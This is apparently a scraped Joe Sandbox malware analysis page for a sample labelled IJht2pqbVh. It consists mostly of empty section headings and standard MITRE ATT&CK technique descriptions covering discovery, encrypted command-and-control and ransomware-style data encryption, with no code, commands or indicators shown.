Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report IJht2pqbVh

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre